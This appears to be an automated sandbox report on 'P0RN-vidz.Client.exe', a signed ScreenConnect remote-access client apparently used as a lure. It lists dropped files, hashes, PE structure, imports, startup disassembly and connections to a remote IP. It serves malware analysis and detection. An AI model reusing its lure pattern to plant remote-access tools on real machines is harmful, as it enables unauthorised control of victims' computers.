                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....*............"...0..@...........^... ...`....@.. .......................`............@..................................^..O....`...................)...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsFileManager.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\932a2db58c237abd381d22df4c63a04a_9e146be9-c76a-4720-bcdb-53011b87bd06

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):87
                                                                                                                                                                                                                                        Entropy (8bit):3.463057265798253
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:/lqlhGXKRjgjkFmURueGvx2VTUz:4DRPAx2Kz
                                                                                                                                                                                                                                        MD5:D2DED43CE07BFCE4D1C101DFCAA178C8
                                                                                                                                                                                                                                        SHA1:CE928A1293EA2ACA1AC01B61A344857786AFE509
                                                                                                                                                                                                                                        SHA-256:8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
                                                                                                                                                                                                                                        SHA-512:A05486D523556C75FAAEEFE09BB2F8159A111B1B3560142E19048E6E3898A506EE4EA27DD6A4412EE56A7CE7C21E8152B1CDD92804BAF9FAC43973FABE006A2F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:......../...............................Microsoft Enhanced Cryptographic Provider v1.0.

                                                                                                                                                                                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):55
                                                                                                                                                                                                                                        Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                                                                                        C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1835008
                                                                                                                                                                                                                                        Entropy (8bit):4.421612683436905
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:mSvfpi6ceLP/9skLmb0OToWSPHaJG8nAgeMZMMhA2fX4WABlEnNu0uhiTw:FvloToW+EZMM6DFyM03w
                                                                                                                                                                                                                                        MD5:B20FF90A539E082DA3273C30F9DFD210
                                                                                                                                                                                                                                        SHA1:3079D2F831FE59FE0D7DBC0DA7F60BF804FDD83A
                                                                                                                                                                                                                                        SHA-256:0E05254DD04E49EAFBF9E98B03C6CC5C1474460F113376C3915CBBC67414CDD1
                                                                                                                                                                                                                                        SHA-512:9D8511E9973E2FFE76E8BFDC5AD509EE98E60B9ABF1E651941A3398B3CA976828411E3B60A2A7DC3FA03EC4A0678DE00FF482E20CDE393338D05701DF3BF1F26
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.=..S.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Entropy (8bit):6.48329361336188
                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                        File name:P0RN-vidz.Client.exe
                                                                                                                                                                                                                                        File size:84'432 bytes
                                                                                                                                                                                                                                        MD5:af0d6501f817b8769618c6cbca8b4f65
                                                                                                                                                                                                                                        SHA1:c6f57c44cfe15d219beb066a2098367e8750c0d4
                                                                                                                                                                                                                                        SHA256:2cbee0d0b19b59d5176a0c9da2385da30f5df66818da9be4614f2a7b7c888967
                                                                                                                                                                                                                                        SHA512:a0fde1cc11a02933c258587aa6bfb1bebe552b5dbc46340226611fb8ec1a1cc043e1aa1c3e098ee71a5dd112ccfd5a3ad98329a5895ff9973125a83ba835f569
                                                                                                                                                                                                                                        SSDEEP:1536:IoFsMHqzISrGqx0WiwbqKHxfd6dldV0OCJRpsWr6cdYV7hsYYYP7tg:99q8tC0C+axfdalBqRfbYRGYYYPO
                                                                                                                                                                                                                                        TLSH:DD834B13B5E18475E9720E3118B1D9B4593FBE114E688EAB3398433A0F351D19E3AE7B
                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>{yD_.*D_.*D_.*...*N_.*...*>_.*...*\_.*...+V_.*...+V_.*...+a_.*M'.*A_.*D_.*%_.*W..+E_.*W..*E_.*W..+E_.*RichD_.*........PE..L..

                                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                                        Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Entrypoint:0x401489
                                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                                        Digitally signed:true
                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                        Time Stamp:0x6734FBFF [Wed Nov 13 19:20:31 2024 UTC]
                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                                                                                        OS Version Minor:1
                                                                                                                                                                                                                                        File Version Major:5
                                                                                                                                                                                                                                        File Version Minor:1
                                                                                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                                                                                        Subsystem Version Minor:1
                                                                                                                                                                                                                                        Import Hash:37d5c89163970dd3cc69230538a1b72b

                                                                                                                                                                                                                                        Authenticode Signature

                                                                                                                                                                                                                                        Signature Valid:true
                                                                                                                                                                                                                                        Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                                        Signature Validation Error:The operation completed successfully
                                                                                                                                                                                                                                        Error Number:0
                                                                                                                                                                                                                                        Not Before, Not After
                                                                                                                                                                                                                                        • 17/08/2022 02:00:00 16/08/2025 01:59:59
                                                                                                                                                                                                                                        Subject Chain
                                                                                                                                                                                                                                        • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                                                                                                                                                                                        Version:3
                                                                                                                                                                                                                                        Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                                                                                                                                                                                        Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                                                                                                                                                                                        Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                                                                                                                                                                                        Serial:0B9360051BCCF66642998998D5BA97CE

                                                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                        call 00007F5C68F3F52Bh
                                                                                                                                                                                                                                        jmp 00007F5C68F3EFDFh
                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                                                        push 00000000h
                                                                                                                                                                                                                                        call dword ptr [0040B048h]
                                                                                                                                                                                                                                        push dword ptr [ebp+08h]
                                                                                                                                                                                                                                        call dword ptr [0040B044h]
                                                                                                                                                                                                                                        push C0000409h
                                                                                                                                                                                                                                        call dword ptr [0040B04Ch]
                                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                                        call dword ptr [0040B050h]
                                                                                                                                                                                                                                        pop ebp
                                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                                                        sub esp, 00000324h
                                                                                                                                                                                                                                        push 00000017h
                                                                                                                                                                                                                                        call dword ptr [0040B054h]
                                                                                                                                                                                                                                        test eax, eax
                                                                                                                                                                                                                                        je 00007F5C68F3F167h
                                                                                                                                                                                                                                        push 00000002h
                                                                                                                                                                                                                                        pop ecx
                                                                                                                                                                                                                                        int 29h
                                                                                                                                                                                                                                        mov dword ptr [004118C0h], eax
                                                                                                                                                                                                                                        mov dword ptr [004118BCh], ecx
                                                                                                                                                                                                                                        mov dword ptr [004118B8h], edx
                                                                                                                                                                                                                                        mov dword ptr [004118B4h], ebx
                                                                                                                                                                                                                                        mov dword ptr [004118B0h], esi
                                                                                                                                                                                                                                        mov dword ptr [004118ACh], edi
                                                                                                                                                                                                                                        mov word ptr [004118D8h], ss
                                                                                                                                                                                                                                        mov word ptr [004118CCh], cs
                                                                                                                                                                                                                                        mov word ptr [004118A8h], ds
                                                                                                                                                                                                                                        mov word ptr [004118A4h], es
                                                                                                                                                                                                                                        mov word ptr [004118A0h], fs
                                                                                                                                                                                                                                        mov word ptr [0041189Ch], gs
                                                                                                                                                                                                                                        pushfd
                                                                                                                                                                                                                                        pop dword ptr [004118D0h]
                                                                                                                                                                                                                                        mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                                                        mov dword ptr [004118C4h], eax
                                                                                                                                                                                                                                        mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                                        mov dword ptr [004118C8h], eax
                                                                                                                                                                                                                                        lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                                        mov dword ptr [004118D4h], eax
                                                                                                                                                                                                                                        mov eax, dword ptr [ebp-00000324h]
                                                                                                                                                                                                                                        mov dword ptr [00411810h], 00010001h

                                                                                                                                                                                                                                        Rich Headers

                                                                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                                                                        • [IMP] VS2008 SP1 build 30729

                                                                                                                                                                                                                                        Data Directories

                                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x1061c0x3c.rdata
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x130000x1e0.rsrc
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x11c000x2dd0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x140000xe04.reloc
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0xfe380x70.rdata
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xfd780x40.rdata
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0xb0000x13c.rdata
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                        Sections

                                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                        .text0x10000x9e480xa0005ddb7b5f8f3e7cf367aa8d42f73ccac6False0.6005615234375data6.567092617128995IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                        .rdata0xb0000x5d680x5e00611d5d2918b543ab45e808916f086ea2False0.418218085106383Applesoft BASIC program data, first line number 14.846977766446331IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                        .data0x110000x11cc0x800ebd4e3ddf3b21f8420973cad57b75504False0.166015625data2.0362547390297028IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        .rsrc0x130000x1e00x200aa256780346be2e1ee49ac6d69d2faffFalse0.52734375data4.703723272345726IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                        .reloc0x140000xe040x1000f753d4f09f6421d0dae41cab2d5532cfFalse0.69189453125data6.157957291444729IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                        Resources

                                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                        RT_MANIFEST0x130600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                                                                                                                                                        Imports

                                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                                        KERNEL32.dllLocalFree, GetProcAddress, LoadLibraryA, Sleep, LocalAlloc, GetModuleFileNameW, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, GetModuleFileNameA, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW, CreateFileW
                                                                                                                                                                                                                                        CRYPT32.dllCertDeleteCertificateFromStore, CryptMsgGetParam, CertCloseStore, CryptQueryObject, CertAddCertificateContextToStore, CertFindAttribute, CertFreeCertificateContext, CertCreateCertificateContext, CertOpenSystemStoreA

                                                                                                                                                                                                                                        Possible Origin

                                                                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                        EnglishUnited States

                                                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:26.920728922 CET49705443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:26.920787096 CET44349705147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:26.920862913 CET49705443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:26.944915056 CET49705443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:26.944938898 CET44349705147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:28.956917048 CET44349705147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:28.956998110 CET49705443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:28.962193966 CET49705443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:28.962208033 CET44349705147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:28.962553978 CET44349705147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.005929947 CET49705443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.024359941 CET49705443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.071342945 CET44349705147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.459840059 CET44349705147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.459872007 CET44349705147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.459882021 CET44349705147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.459898949 CET44349705147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.459928989 CET49705443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.459934950 CET44349705147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.459964991 CET44349705147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.459981918 CET49705443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.459981918 CET49705443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.460000992 CET49705443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.510792017 CET49705443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.696722984 CET44349705147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.696737051 CET44349705147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.696778059 CET44349705147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.696809053 CET44349705147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.696809053 CET49705443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.696831942 CET44349705147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.696860075 CET49705443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.696877003 CET49705443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.732844114 CET44349705147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.732881069 CET44349705147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.732954979 CET49705443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.732981920 CET44349705147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.733006954 CET49705443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.733023882 CET49705443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.902736902 CET44349705147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.902765989 CET44349705147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.902940989 CET49705443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.902970076 CET44349705147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.903011084 CET49705443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.941391945 CET44349705147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.941412926 CET44349705147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.941473007 CET49705443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.941498041 CET44349705147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.941612959 CET49705443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.974441051 CET44349705147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.974459887 CET44349705147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.974503994 CET49705443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.974526882 CET44349705147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.974543095 CET49705443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:29.974585056 CET49705443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:30.095949888 CET44349705147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:30.095979929 CET44349705147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:30.096044064 CET49705443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:30.096079111 CET44349705147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:30.096102953 CET49705443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:30.096117973 CET49705443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:30.104708910 CET44349705147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:30.104782104 CET49705443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:30.104804993 CET44349705147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:30.104829073 CET44349705147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:30.104876041 CET49705443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:30.108628035 CET49705443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:31.382853031 CET49710443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:31.382889986 CET44349710147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:31.382965088 CET49710443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:31.383354902 CET49710443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:31.383366108 CET44349710147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:32.984570026 CET44349710147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:32.987759113 CET49710443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:32.987803936 CET44349710147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:33.690567970 CET44349710147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:33.690603018 CET44349710147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:33.690623045 CET44349710147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:33.690774918 CET49710443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:33.690834045 CET44349710147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:33.690887928 CET49710443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:33.694590092 CET44349710147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:33.694705009 CET49710443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:33.698703051 CET44349710147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:33.698779106 CET44349710147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:33.698785067 CET49710443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:33.698827982 CET49710443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:33.723011017 CET49710443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:41.133275032 CET49722443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:41.133328915 CET44349722147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:41.133407116 CET49722443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:41.133656979 CET49722443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:41.133671045 CET44349722147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:42.491908073 CET44349722147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:42.502187967 CET49722443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:42.502224922 CET44349722147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.204821110 CET44349722147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.204849958 CET44349722147.75.81.6192.168.2.5
